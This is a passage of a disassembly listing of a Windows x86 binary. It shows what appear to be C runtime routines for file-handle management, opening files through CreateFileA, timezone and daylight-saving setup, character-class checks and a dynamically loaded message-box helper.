and eax, 1Fh
sar ecx, 5
mov ecx, dword_493E60[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_41EDC4
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41EDC4: ; CODE XREF: sub_41ED9C+A�j
; sub_41ED9C+23�j
and dword_4927F8, 0
mov dword_4927F4, 9
or eax, 0FFFFFFFFh
retn
sub_41ED9C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
xor bl, bl
test byte ptr [ebp+0Ch], 8
push esi
jz short loc_41EDE9
add bl, 20h
loc_41EDE9: ; CODE XREF: .text:0041EDE4�j
test byte ptr [ebp+0Dh], 40h
jz short loc_41EDF2
or bl, 80h
loc_41EDF2: ; CODE XREF: .text:0041EDED�j
test byte ptr [ebp+0Ch], 80h
jz short loc_41EDFB
or bl, 10h
loc_41EDFB: ; CODE XREF: .text:0041EDF6�j
push dword ptr [ebp+8]
call ds:dword_495314 ; GetFileType
test eax, eax
jnz short loc_41EE1A
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
call sub_41C4E8
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_41EE72
; ---------------------------------------------------------------------------
loc_41EE1A: ; CODE XREF: .text:0041EE06�j
cmp eax, 2
jnz short loc_41EE24
or bl, 40h
jmp short loc_41EE2C
; ---------------------------------------------------------------------------
loc_41EE24: ; CODE XREF: .text:0041EE1D�j
cmp eax, 3
jnz short loc_41EE2C
or bl, 8
loc_41EE2C: ; CODE XREF: .text:0041EE22�j
; .text:0041EE27�j
call sub_41EC16
mov esi, eax
or eax, 0FFFFFFFFh
cmp esi, eax
jnz short loc_41EE4D
and dword_4927F8, 0
mov dword_4927F4, 18h
jmp short loc_41EE72
; ---------------------------------------------------------------------------
loc_41EE4D: ; CODE XREF: .text:0041EE38�j
push dword ptr [ebp+8]
push esi
call sub_41ECAB
pop ecx
mov eax, esi
pop ecx
or bl, 1
sar eax, 5
mov ecx, esi
mov eax, dword_493E60[eax*4]
and ecx, 1Fh
mov [eax+ecx*8+4], bl
mov eax, esi
loc_41EE72: ; CODE XREF: .text:0041EE18�j
; .text:0041EE4B�j
pop esi
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_41EE76 proc near ; CODE XREF: sub_41BF24+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_493F9C
jnb short loc_41EEBF
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, dword_493E60[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_41EEBF
push eax
call sub_41ED9C
pop ecx
push eax
call ds:dword_4952F8 ; FlushFileBuffers
test eax, eax
jnz short loc_41EEB4
call ds:dword_495328 ; RtlGetLastWin32Error
jmp short loc_41EEB6
; ---------------------------------------------------------------------------
loc_41EEB4: ; CODE XREF: sub_41EE76+34�j
xor eax, eax
loc_41EEB6: ; CODE XREF: sub_41EE76+3C�j
test eax, eax
jz short locret_41EECC
mov dword_4927F8, eax
loc_41EEBF: ; CODE XREF: sub_41EE76+A�j
; sub_41EE76+22�j
mov dword_4927F4, 9
or eax, 0FFFFFFFFh
locret_41EECC: ; CODE XREF: sub_41EE76+42�j
retn
sub_41EE76 endp
; ---------------------------------------------------------------------------
push dword ptr [esp+0Ch]
push 40h
push dword ptr [esp+10h]
push dword ptr [esp+10h]
call sub_41EEE4
add esp, 10h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EEE4 proc near ; CODE XREF: sub_41C300+13F�p
; .text:0041EEDB�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_41EF0A
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_41EF15
; ---------------------------------------------------------------------------
loc_41EF0A: ; CODE XREF: sub_41EEE4+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41EF15: ; CODE XREF: sub_41EEE4+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_41EF2F
test ch, 40h
jnz short loc_41EF2B
cmp dword_492AD4, eax
jz short loc_41EF2F
loc_41EF2B: ; CODE XREF: sub_41EEE4+3D�j
or [ebp+var_1], 80h
loc_41EF2F: ; CODE XREF: sub_41EEE4+38�j
; sub_41EEE4+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_41EF67
dec eax
jz short loc_41EF5E
dec eax
jz short loc_41EF55
loc_41EF40: ; CODE XREF: sub_41EEE4+9F�j
; sub_41EEE4+E8�j ...
mov dword_4927F4, 16h
mov dword_4927F8, ebx
jmp loc_41F17A
; ---------------------------------------------------------------------------
loc_41EF55: ; CODE XREF: sub_41EEE4+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_41EF6E
; ---------------------------------------------------------------------------
loc_41EF5E: ; CODE XREF: sub_41EEE4+57�j
mov [ebp+var_C], 40000000h
jmp short loc_41EF6E
; ---------------------------------------------------------------------------
loc_41EF67: ; CODE XREF: sub_41EEE4+54�j
mov [ebp+var_C], 80000000h
loc_41EF6E: ; CODE XREF: sub_41EEE4+78�j
; sub_41EEE4+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_41EF9C
cmp eax, 20h
jz short loc_41EF93
cmp eax, 30h
jz short loc_41EF8A
cmp eax, 40h
jnz short loc_41EF40
mov [ebp+var_10], esi
jmp short loc_41EF9F
; ---------------------------------------------------------------------------
loc_41EF8A: ; CODE XREF: sub_41EEE4+9A�j
mov [ebp+var_10], 2
jmp short loc_41EF9F
; ---------------------------------------------------------------------------
loc_41EF93: ; CODE XREF: sub_41EEE4+95�j
mov [ebp+var_10], 1
jmp short loc_41EF9F
; ---------------------------------------------------------------------------
loc_41EF9C: ; CODE XREF: sub_41EEE4+90�j
mov [ebp+var_10], ebx
loc_41EF9F: ; CODE XREF: sub_41EEE4+A4�j
; sub_41EEE4+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_41EFE9
jz short loc_41EFE4
cmp ecx, ebx
jz short loc_41EFE4
cmp ecx, edi
jz short loc_41EFDB
cmp ecx, 200h
jz short loc_41F002
cmp ecx, 300h
jnz loc_41EF40
mov [ebp+var_8], 2
jmp short loc_41F012
; ---------------------------------------------------------------------------
loc_41EFDB: ; CODE XREF: sub_41EEE4+D8�j
mov [ebp+var_8], 4
jmp short loc_41F012
; ---------------------------------------------------------------------------
loc_41EFE4: ; CODE XREF: sub_41EEE4+D0�j
; sub_41EEE4+D4�j
mov [ebp+var_8], esi
jmp short loc_41F012
; ---------------------------------------------------------------------------
loc_41EFE9: ; CODE XREF: sub_41EEE4+CE�j
cmp ecx, 500h
jz short loc_41F00B
cmp ecx, 600h
jz short loc_41F002
cmp ecx, edx
jz short loc_41F00B
jmp loc_41EF40
; ---------------------------------------------------------------------------
loc_41F002: ; CODE XREF: sub_41EEE4+E0�j
; sub_41EEE4+113�j
mov [ebp+var_8], 5
jmp short loc_41F012
; ---------------------------------------------------------------------------
loc_41F00B: ; CODE XREF: sub_41EEE4+10B�j
; sub_41EEE4+117�j
mov [ebp+var_8], 1
loc_41F012: ; CODE XREF: sub_41EEE4+F5�j
; sub_41EEE4+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_41F031
mov ecx, dword_4927FC
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_41F031
push 1
pop esi
loc_41F031: ; CODE XREF: sub_41EEE4+138�j
; sub_41EEE4+148�j
test al, 40h
jz short loc_41F03F
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_41F03F: ; CODE XREF: sub_41EEE4+14F�j
test ah, 10h
jz short loc_41F046
or esi, edi
loc_41F046: ; CODE XREF: sub_41EEE4+15E�j
test al, 20h
jz short loc_41F052
or esi, 8000000h
jmp short loc_41F05C
; ---------------------------------------------------------------------------
loc_41F052: ; CODE XREF: sub_41EEE4+164�j
test al, 10h
jz short loc_41F05C
or esi, 10000000h
loc_41F05C: ; CODE XREF: sub_41EEE4+16C�j
; sub_41EEE4+170�j
call sub_41EC16
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_41F07D
and dword_4927F8, 0
mov dword_4927F4, 18h
jmp short loc_41F0BB
; ---------------------------------------------------------------------------
loc_41F07D: ; CODE XREF: sub_41EEE4+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call ds:dword_495360 ; CreateFileA
mov esi, eax
cmp esi, edi
jz short loc_41F0AE
push esi
call ds:dword_495314 ; GetFileType
test eax, eax
jnz short loc_41F0C2
push esi
call ds:dword_495358 ; CloseHandle
loc_41F0AE: ; CODE XREF: sub_41EEE4+1B6�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
call sub_41C4E8
pop ecx
loc_41F0BB: ; CODE XREF: sub_41EEE4+197�j
mov eax, edi
jmp loc_41F198
; ---------------------------------------------------------------------------
loc_41F0C2: ; CODE XREF: sub_41EEE4+1C1�j
cmp eax, 2
jnz short loc_41F0CD
or [ebp+var_1], 40h
jmp short loc_41F0D6
; ---------------------------------------------------------------------------
loc_41F0CD: ; CODE XREF: sub_41EEE4+1E1�j
cmp eax, 3
jnz short loc_41F0D6
or [ebp+var_1], 8
loc_41F0D6: ; CODE XREF: sub_41EEE4+1E7�j
; sub_41EEE4+1EC�j
push esi
push ebx
call sub_41ECAB
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:493E60h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_41F17F
test al, 80h
jz short loc_41F17F
test byte ptr [ebp+arg_4], 2
jz short loc_41F17F
push 2
push 0FFFFFFFFh
push ebx
call sub_41CE78
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41F134
cmp dword_4927F8, 83h
jz short loc_41F17F
jmp short loc_41F173
; ---------------------------------------------------------------------------
loc_41F134: ; CODE XREF: sub_41EEE4+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_41C10A
add esp, 0Ch
test eax, eax
jnz short loc_41F161
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_41F161
push [ebp+var_10]
push ebx
call sub_42055F
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41F173
loc_41F161: ; CODE XREF: sub_41EEE4+265�j
; sub_41EEE4+26B�j
push 0
push 0
push ebx
call sub_41CE78
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_41F17F
loc_41F173: ; CODE XREF: sub_41EEE4+24E�j
; sub_41EEE4+27B�j
push ebx
call sub_41BE46
pop ecx
loc_41F17A: ; CODE XREF: sub_41EEE4+6C�j
or eax, 0FFFFFFFFh
jmp short loc_41F198
; ---------------------------------------------------------------------------
loc_41F17F: ; CODE XREF: sub_41EEE4+221�j
; sub_41EEE4+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41F196
test byte ptr [ebp+arg_4], 8
jz short loc_41F196
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_41F196: ; CODE XREF: sub_41EEE4+29F�j
; sub_41EEE4+2A5�j
mov eax, ebx
loc_41F198: ; CODE XREF: sub_41EEE4+1D9�j
; sub_41EEE4+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EEE4 endp
; =============== S U B R O U T I N E =======================================
sub_41F19D proc near ; CODE XREF: sub_41C623:loc_41C662�p
cmp dword_492AB0, 0
jnz short locret_41F1B1
call sub_41F1B2
inc dword_492AB0
locret_41F1B1: ; CODE XREF: sub_41F19D+7�j
retn
sub_41F19D endp
; =============== S U B R O U T I N E =======================================
sub_41F1B2 proc near ; CODE XREF: sub_41F19D+9�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov dword_4929F8, ebp
mov dword_436528, ebx
mov dword_436518, ebx
call sub_4206A5
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_41F2DB
push offset dword_492A00
call ds:dword_495438 ; GetTimeZoneInformation
cmp eax, ebx
jz loc_41F40A
mov eax, dword_492A00
mov ecx, dword_492A54
imul eax, 3Ch
cmp word_492A46, bp
push 1
pop edx
mov dword_436480, eax
mov dword_4929F8, edx
jz short loc_41F229
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword_436480, eax
loc_41F229: ; CODE XREF: sub_41F1B2+69�j
cmp word_492A9A, bp
jz short loc_41F24D
mov eax, dword_492AA8
cmp eax, ebp
jz short loc_41F24D
sub eax, ecx
mov dword_436484, edx
imul eax, 3Ch
mov dword_436488, eax
jmp short loc_41F259
; ---------------------------------------------------------------------------
loc_41F24D: ; CODE XREF: sub_41F1B2+7E�j
; sub_41F1B2+87�j
mov dword_436484, ebp
mov dword_436488, ebp
loc_41F259: ; CODE XREF: sub_41F1B2+99�j
lea eax, [esp+14h+var_4]
mov esi, ds:dword_4953E8
push eax
push ebp
push 3Fh
mov edi, 220h
push off_43650C
push ebx
push offset dword_492A04
push edi
push dword_49289C
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_41F296
cmp [esp+14h+var_4], ebp
jnz short loc_41F296
mov eax, off_43650C
and byte ptr [eax+3Fh], 0
jmp short loc_41F29E
; ---------------------------------------------------------------------------
loc_41F296: ; CODE XREF: sub_41F1B2+D1�j
; sub_41F1B2+D7�j
mov eax, off_43650C
and byte ptr [eax], 0
loc_41F29E: ; CODE XREF: sub_41F1B2+E2�j
lea eax, [esp+14h+var_4]
push eax
push ebp
push 3Fh
push off_436510
push ebx
push offset dword_492A58
push edi
push dword_49289C
call esi ; WideCharToMultiByte
test eax, eax
jz loc_41F402
cmp [esp+14h+var_4], ebp
jnz loc_41F402
mov eax, off_436510
and byte ptr [eax+3Fh], 0
jmp loc_41F40A
; ---------------------------------------------------------------------------
loc_41F2DB: ; CODE XREF: sub_41F1B2+2D�j
cmp byte ptr [esi], 0
jz loc_41F40A
mov eax, dword_492AAC
cmp eax, ebp
jz short loc_41F2FE
push eax
push esi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_41F40A
loc_41F2FE: ; CODE XREF: sub_41F1B2+139�j
push dword_492AAC
call sub_415D6C
push esi
call sub_4158E0
inc eax
push eax
call sub_415CF8
add esp, 0Ch
cmp eax, ebp
mov dword_492AAC, eax
jz loc_41F40A
push esi
push eax
call sub_4175D0
push 3
push esi
push off_43650C
call sub_416A10
mov eax, off_43650C
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_41F353
push 1
inc esi
pop edi
loc_41F353: ; CODE XREF: sub_41F1B2+19B�j
push esi
call sub_416C44
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword_436480, ecx
loc_41F36A: ; CODE XREF: sub_41F1B2+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_41F378
cmp al, bl
jl short loc_41F37B
cmp al, 39h
jg short loc_41F37B
loc_41F378: ; CODE XREF: sub_41F1B2+1BC�j
inc esi
jmp short loc_41F36A
; ---------------------------------------------------------------------------
loc_41F37B: ; CODE XREF: sub_41F1B2+1C0�j
; sub_41F1B2+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_41F3CE
inc esi
push esi
call sub_416C44
imul eax, 3Ch
pop ecx
mov ecx, dword_436480
add ecx, eax
mov dword_436480, ecx
loc_41F399: ; CODE XREF: sub_41F1B2+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_41F3A6
cmp al, 39h
jg short loc_41F3A6
inc esi
jmp short loc_41F399
; ---------------------------------------------------------------------------
loc_41F3A6: ; CODE XREF: sub_41F1B2+1EB�j
; sub_41F1B2+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_41F3CE
inc esi
push esi
call sub_416C44
pop ecx
mov ecx, dword_436480
add ecx, eax
mov dword_436480, ecx
loc_41F3C1: ; CODE XREF: sub_41F1B2+21A�j
mov al, [esi]
cmp al, bl
jl short loc_41F3CE
cmp al, 39h
jg short loc_41F3CE
inc esi
jmp short loc_41F3C1
; ---------------------------------------------------------------------------
loc_41F3CE: ; CODE XREF: sub_41F1B2+1CC�j
; sub_41F1B2+1F7�j ...
cmp edi, ebp
jz short loc_41F3DA
neg ecx
mov dword_436480, ecx
loc_41F3DA: ; CODE XREF: sub_41F1B2+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov dword_436484, eax
jz short loc_41F402
push 3
push esi
push off_436510
call sub_416A10
mov eax, off_436510
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_41F40A
; ---------------------------------------------------------------------------
loc_41F402: ; CODE XREF: sub_41F1B2+10B�j
; sub_41F1B2+115�j ...
mov eax, off_436510
and byte ptr [eax], 0
loc_41F40A: ; CODE XREF: sub_41F1B2+40�j
; sub_41F1B2+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_41F1B2 endp
; =============== S U B R O U T I N E =======================================
sub_41F410 proc near ; CODE XREF: sub_41C623+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword_436484, edi
jnz short loc_41F424
loc_41F41D: ; CODE XREF: sub_41F410+148�j
; sub_41F410+150�j ...
xor eax, eax
jmp loc_41F570
; ---------------------------------------------------------------------------
loc_41F424: ; CODE XREF: sub_41F410+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword_436518
jnz short loc_41F442
cmp eax, dword_436528
jz loc_41F544
loc_41F442: ; CODE XREF: sub_41F410+24�j
cmp dword_4929F8, edi
jz loc_41F51A
movzx ecx, word_492AA6
push ecx
cmp word_492A98, di
movzx ecx, word_492AA4
push ecx
movzx ecx, word_492AA2
push ecx
movzx ecx, word_492AA0
push ecx
jnz short loc_41F494
movzx ecx, word_492A9C
push edi
push ecx
movzx ecx, word_492A9E
push ecx
movzx ecx, word_492A9A
push ecx
push eax
push ebx
jmp short loc_41F4A8
; ---------------------------------------------------------------------------
loc_41F494: ; CODE XREF: sub_41F410+65�j
movzx ecx, word_492A9E
push ecx
push edi
movzx ecx, word_492A9A
push edi
push ecx
push eax
push edi
loc_41F4A8: ; CODE XREF: sub_41F410+82�j
push ebx
call sub_41F5BC
movzx eax, word_492A52
add esp, 2Ch
cmp word_492A44, di
push eax
movzx eax, word_492A50
push eax
movzx eax, word_492A4E
push eax
movzx eax, word_492A4C
push eax
jnz short loc_41F502
movzx eax, word_492A48
push edi
push eax
movzx eax, word_492A4A
push eax
movzx eax, word_492A46
push eax
push dword ptr [esi+14h]
push ebx
loc_41F4F7: ; CODE XREF: sub_41F410+108�j
push edi
call sub_41F5BC
add esp, 2Ch
jmp short loc_41F544
; ---------------------------------------------------------------------------
loc_41F502: ; CODE XREF: sub_41F410+C8�j
movzx eax, word_492A4A
push eax
push edi
movzx eax, word_492A46
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_41F4F7
; ---------------------------------------------------------------------------
loc_41F51A: ; CODE XREF: sub_41F410+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_41F5BC
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_41F5BC
add esp, 58h
loc_41F544: ; CODE XREF: sub_41F410+2C�j
; sub_41F410+F0�j
mov edx, dword_43651C
mov eax, dword_43652C
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_41F574
cmp ecx, edx
jl loc_41F41D
cmp ecx, eax
jg loc_41F41D
cmp ecx, edx
jle short loc_41F588
cmp ecx, eax
jge short loc_41F588
loc_41F56E: ; CODE XREF: sub_41F410+166�j
; sub_41F410+16A�j
mov eax, ebx
loc_41F570: ; CODE XREF: sub_41F410+F�j
; sub_41F410+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F574: ; CODE XREF: sub_41F410+144�j
cmp ecx, eax
jl short loc_41F56E
cmp ecx, edx
jg short loc_41F56E
cmp ecx, eax
jle short loc_41F588
cmp ecx, edx
jl loc_41F41D
loc_41F588: ; CODE XREF: sub_41F410+158�j
; sub_41F410+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_41F5AF
xor ecx, ecx
cmp eax, dword_436520
setnl cl
loc_41F5AB: ; CODE XREF: sub_41F410+1AA�j
mov eax, ecx
jmp short loc_41F570
; ---------------------------------------------------------------------------
loc_41F5AF: ; CODE XREF: sub_41F410+18E�j
xor ecx, ecx
cmp eax, dword_436530
setl cl
jmp short loc_41F5AB
sub_41F410 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F5BC proc near ; CODE XREF: sub_41F410+99�p
; sub_41F410+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_41F657
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_41F5E7
shl esi, 2
mov eax, dword_436530[esi]
jmp short loc_41F5F0
; ---------------------------------------------------------------------------
loc_41F5E7: ; CODE XREF: sub_41F5BC+1E�j
shl esi, 2
mov eax, dword_436564[esi]
loc_41F5F0: ; CODE XREF: sub_41F5BC+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jge short loc_41F62A
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_41F634
; ---------------------------------------------------------------------------
loc_41F62A: ; CODE XREF: sub_41F5BC+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_41F634: ; CODE XREF: sub_41F5BC+6C�j
cmp [ebp+arg_10], 5
jnz short loc_41F672
cmp [ebp+arg_8], 0
jnz short loc_41F648
mov esi, dword_436534[esi]
jmp short loc_41F64E
; ---------------------------------------------------------------------------
loc_41F648: ; CODE XREF: sub_41F5BC+82�j
mov esi, dword_436568[esi]
loc_41F64E: ; CODE XREF: sub_41F5BC+8A�j
cmp ecx, esi
jle short loc_41F672
sub ecx, 7
jmp short loc_41F672
; ---------------------------------------------------------------------------
loc_41F657: ; CODE XREF: sub_41F5BC+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_41F668
mov ecx, dword_436530[eax*4]
jmp short loc_41F66F
; ---------------------------------------------------------------------------
loc_41F668: ; CODE XREF: sub_41F5BC+A1�j
mov ecx, dword_436564[eax*4]
loc_41F66F: ; CODE XREF: sub_41F5BC+AA�j
add ecx, [ebp+arg_18]
loc_41F672: ; CODE XREF: sub_41F5BC+7C�j
; sub_41F5BC+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_41F6A3
mov eax, [ebp+arg_1C]
mov dword_43651C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword_436518, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_436520, eax
jmp short loc_41F6F8
; ---------------------------------------------------------------------------
loc_41F6A3: ; CODE XREF: sub_41F5BC+BA�j
mov eax, [ebp+arg_1C]
mov dword_43652C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword_436488
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_436530, eax
jns short loc_41F6DB
add eax, 5265C00h
dec ecx
mov dword_436530, eax
jmp short loc_41F6EC
; ---------------------------------------------------------------------------
loc_41F6DB: ; CODE XREF: sub_41F5BC+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_41F6F2
sub eax, edx
inc ecx
mov dword_436530, eax
loc_41F6EC: ; CODE XREF: sub_41F5BC+11D�j
mov dword_43652C, ecx
loc_41F6F2: ; CODE XREF: sub_41F5BC+126�j
mov dword_436528, ebx
loc_41F6F8: ; CODE XREF: sub_41F5BC+E5�j
pop esi
pop ebx
pop ebp
retn
sub_41F5BC endp
; ---------------------------------------------------------------------------
push 1
push 0
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
push 3
push 0
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
push 2
push 0
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
push 1
push 107h
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
push 1
push 103h
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
push 3
push 117h
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
push 3
push 157h
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
push 2
push 10h
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
retn
; =============== S U B R O U T I N E =======================================
sub_41F790 proc near ; CODE XREF: sub_41D1EE+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_41F7D9
add esp, 0Ch
retn
sub_41F790 endp
; ---------------------------------------------------------------------------
push 8
push 0
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
cmp dword_493FA0, 3A4h
jnz short loc_41F7D6
push 3
push 0
push dword ptr [esp+0Ch]
call sub_41F7D9
add esp, 0Ch
test eax, eax
jz short loc_41F7D6
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41F7D6: ; CODE XREF: .text:0041F7BC�j
; .text:0041F7D0�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_41F7D9 proc near ; CODE XREF: .text:0041F704�p
; .text:0041F715�p ...
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_494141[eax], cl
jnz short loc_41F806
cmp [esp+arg_4], 0
jz short loc_41F7FF
movzx eax, word_435C36[eax*2]
and eax, [esp+arg_4]
jmp short loc_41F801
; ---------------------------------------------------------------------------
loc_41F7FF: ; CODE XREF: sub_41F7D9+16�j
xor eax, eax
loc_41F801: ; CODE XREF: sub_41F7D9+24�j
test eax, eax
jnz short loc_41F806
retn
; ---------------------------------------------------------------------------
loc_41F806: ; CODE XREF: sub_41F7D9+F�j
; sub_41F7D9+2A�j
push 1
pop eax
retn
sub_41F7D9 endp
; =============== S U B R O U T I N E =======================================
sub_41F80A proc near ; CODE XREF: sub_41D965+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_492AB4, ebx
push esi
push edi
jnz short loc_41F859
push offset aUser32_dll ; "user32.dll"
call ds:dword_4953C0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_41F88F
mov esi, ds:dword_4953C4
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_492AB4, eax
jz short loc_41F88F
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_492AB8, eax
call esi ; GetProcAddress
mov dword_492ABC, eax
loc_41F859: ; CODE XREF: sub_41F80A+B�j
mov eax, dword_492AB8
test eax, eax
jz short loc_41F878
call eax
mov ebx, eax
test ebx, ebx
jz short loc_41F878
mov eax, dword_492ABC
test eax, eax
jz short loc_41F878
push ebx
call eax
mov ebx, eax
loc_41F878: ; CODE XREF: sub_41F80A+56�j
; sub_41F80A+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_492AB4
loc_41F88B: ; CODE XREF: sub_41F80A+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F88F: ; CODE XREF: sub_41F80A+1C�j
; sub_41F80A+33�j
xor eax, eax
